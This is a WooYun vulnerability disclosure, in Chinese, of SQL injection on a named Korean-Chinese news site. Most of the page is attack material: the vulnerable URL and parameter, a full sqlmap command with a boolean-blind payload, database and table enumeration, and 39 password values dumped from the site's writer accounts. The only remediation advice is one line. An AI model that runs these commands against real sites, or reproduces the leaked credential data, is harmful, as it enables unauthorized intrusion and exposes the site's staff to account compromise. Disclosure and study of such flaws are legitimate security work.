当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155638

漏洞标题:韩国经济bnt新闻网主站存在SQL注入漏洞(11W相片信息泄露+大量用户密码泄露)

相关厂商:韩国经济bnt新闻网

漏洞作者: 路人甲

提交时间:2015-11-25 14:06

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

时装, 美容, 娱乐, 文化等综合网络新闻
新闻资讯
ON/OFF LINEs综合广告
文化艺术活动策划

详细说明:

地址:http://www.bntnews.cn/app/news.php?nid=31229

$ python sqlmap.py -u "http://www.bntnews.cn/app/news.php?nid=31229" -p nid --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: BNTNewsChina
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| TRN_SLIDE_IMAGE                       | 118300  |
Database: BNTNewsChina
Table: TRN_SLIDE_IMAGE
[6 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| CAPTION        | varchar(200) |
| DELETE_FLG     | char(1)      |
| ENTRY_DT       | timestamp    |
| PROVIDER       | varchar(200) |
| SLIDE_ID       | int(11)      |
| SLIDE_IMAGE_ID | int(11)      |
+----------------+--------------+


漏洞证明:

---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: nid=(SELECT (CASE WHEN (5491=5491) THEN 5491 ELSE 5491*(SELECT 5491 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user:    'BNTNewsADMIN@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'BNTNewsADMIN'@'localhost'
Database: BNTEconomicCN
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| TRN_NEWS                              | 1648    |
| TRN_WRITER                            | 7       |
| TRN_BANNER                            | 6       |
| MST_MAIN_MENU                         | 4       |
+---------------------------------------+---------+
Database: BNTNewsChina
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| TRN_SLIDE_IMAGE                       | 118300  |
| TRN_NEWS                              | 32843   |
| TRN_PARTNER_NEWS                      | 23018   |
| TRN_NEWS_IMAGE                        | 1102    |
| TRN_BANNER                            | 185     |
| TRN_WRITER                            | 32      |
| MST_SUB_MENU_1ST                      | 16      |
| TRN_BOX_BANNER_IMAGE                  | 6       |
| MST_MAIN_MENU                         | 5       |
| TRN_PARTNER                           | 4       |
| TRN_BOX_BANNER                        | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 495     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| PARTITIONS                            | 44      |
| TABLES                                | 44      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 36      |
| STATISTICS                            | 28      |
| KEY_COLUMN_USAGE                      | 20      |
| TABLE_CONSTRAINTS                     | 19      |
| PROCESSLIST                           | 14      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 3       |
| REFERENTIAL_CONSTRAINTS               | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: BNTEconomicCN
Table: TRN_WRITER
[1 column]
+----------+
| Column   |
+----------+
| PASSWORD |
+----------+
Database: BNTNewsChina
Table: TRN_WRITER
[1 column]
+----------+
| Column   |
+----------+
| PASSWORD |
+----------+
Database: BNTEconomicCN
Table: TRN_WRITER
[7 entries]
+--------------------------+
| PASSWORD                 |
+--------------------------+
| 09cta9HGjLL4rbkH7yhpwg== |
| 3lbojt7DApndv07TFYNGRQ== |
| 5OMqqEs/b3tkA33L6SZ5IA== |
| hDA1wDL/F/5NxDRZRd01nw== |
| P2XstoWVsweGuS2KBrJ9Cg== |
| pfolR1kxvIfaTiwJStoqKw== |
| UJUg1Buae8kEj3qeOT9pBw== |
+--------------------------+
Database: BNTNewsChina
Table: TRN_WRITER
[32 entries]
+--------------------------+
| PASSWORD                 |
+--------------------------+
| 5OMqqEs/b3tkA33L6SZ5IA== |
| 5SKZHqz9Pr8ci/t2uYfZTQ== |
| 6NJNIHcVpBS+YMow6K2MbA== |
| <blank>                  |
| b0JP5xqgtdu0nKxQO5hRIQ== |
| bsR+NsgdAPsdtL/dbtJ8mg== |
| bTqJXv2o5EIjQ0ZbnRGvlw== |
| cj1QVRbgwZfkKmvjwK+RDg== |
| csjGdbl3a8AlE2dt92HjcQ== |
| Exl4LU5vUeZ8MlrDai9uQA== |
| f7x7a1UeA+BsRGCSbZIxTA== |
| FEoS1fH81OVOQfm+tHdyfQ== |
| i4Yk2RzEjO+LWpZnmy0xdg== |
| JEq/ujx7vSGRR7CTBYnP8A== |
| kXSOnB3bE+rR8032wDj+xQ== |
| ky66fDLTBWgpSig/0RQDAg== |
| LS2u9HmHvnTLntHjo5VVrA== |
| mjVoWDsc23lovAEywhhjug== |
| N9IIawjqF7OwR/zwl+KT6Q== |
| O11M6OLZDSsoLFBf1LU59Q== |
| qEmf1gQYcuCYa0Ps3lewFg== |
| r3lWQCheVwbjH7AgdLZaAA== |
| Rp6CKEVxNomoIo8MKd6wBg== |
| ShRUqfShTz79sZZl/6rBcA== |
| T7aKQ6mDBPO8C22LRdl3kA== |
| TibGImNZ5Jzot34ZUyfczQ== |
| <blank>                  |
| wq5FQimHBIhUbDXO7P2Lhg== |
| wxZ6EGOPinEElqowM8otHw== |
| xv4vwfTo4z327STblUgPsA== |
| xZhlSNenQjRG3PZKq/jyDg== |
| YtS7lpS8KQHVOSWx0PiAdw== |
+--------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: nid=(SELECT (CASE WHEN (5491=5491) THEN 5491 ELSE 5491*(SELECT 5491 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: BNTNewsChina
Table: TRN_SLIDE_IMAGE
[6 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| CAPTION        | varchar(200) |
| DELETE_FLG     | char(1)      |
| ENTRY_DT       | timestamp    |
| PROVIDER       | varchar(200) |
| SLIDE_ID       | int(11)      |
| SLIDE_IMAGE_ID | int(11)      |
+----------------+--------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝